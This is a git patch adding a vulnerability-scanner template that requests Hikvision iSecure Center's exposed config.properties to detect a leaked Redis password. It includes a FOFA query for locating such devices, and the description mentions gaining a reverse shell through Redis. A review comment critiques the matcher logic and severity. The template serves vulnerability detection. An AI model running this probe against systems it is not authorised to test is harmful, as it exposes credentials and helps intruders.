From 051451c386cb3c7001387c80589c92b8a1b2a9ea Mon Sep 17 00:00:00 2001
From: r00t <24542600+adeljck@users.noreply.github.com>
Date: Wed, 24 Jul 2024 12:04:26 +0800
Subject: [PATCH] Add hikvision-iSecure-info-leak.yaml
---
.../hikvision-iSecure-info-leak.yaml | 33 +++++++++++++++++++
1 file changed, 33 insertions(+)
create mode 100644 http/vulnerabilities/hikvision/hikvision-iSecure-info-leak.yaml
diff --git a/http/vulnerabilities/hikvision/hikvision-iSecure-info-leak.yaml b/http/vulnerabilities/hikvision/hikvision-iSecure-info-leak.yaml
new file mode 100644
index 0000000000..aadd8d4415
--- /dev/null
+++ b/http/vulnerabilities/hikvision/hikvision-iSecure-info-leak.yaml
@@ -0,0 +1,33 @@
+id: hikvision-iSecure-info-leak
+
+info:
+ name: zongheanfang-info-leak
+ author: adeljck
+ severity: critical
+ description: |
+ Hikvision iSecure Center /portal/conf/config.properties can get encrypted redis password,if server expose redis port.people can get a reverse shell with redis.
+ reference:
+ - https://github.com/adeljck/Hikvision_Info_Leak
+ metadata:
+ verified: true
+ max-request: 2
+ fofa-query: icon_hash="-808437027",app="HIKVISION-综合安防管理平台",title="综合安防管理平台",body="/portal/skin/ifar/blue/skin.css"
+ tags: infoleak,iot,hikvision
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/portal/conf/config.properties"
+ headers:
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+ Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ Accept-Encoding: gzip, deflate
+ Sec-Fetch-Dest: empty
+ Sec-Fetch-Mode: cors
+ Sec-Fetch-Site: same-origin
+ Te: trailers
+ Connection: close
+
+ matchers:
+ - type: word
+ words:
+ - 'password'
\ No newline at end of file
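Review bot: The only matcher is the bare word `password` with no `part`, status check or condition, so any response containing that string (a login page, or a catch-all error body) would be reported as a critical finding. The matcher block should combine the body check with a status check under `matchers-condition: and`, and the word should ideally be a key specific to config.properties rather than a generic term. Separately, `max-request: 2` does not match the single GET in the template, and `name: zongheanfang-info-leak` differs from the id and the file name. The description states a consequence (exposed Redis) that the template does not test for, so `severity: critical` appears to rate the worst case rather than what a match actually proves.

```yaml
    # … unchanged: request method, path and headers …
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'password'  # placeholder: replace with a key specific to config.properties
      - type: status
        status:
          - 200
```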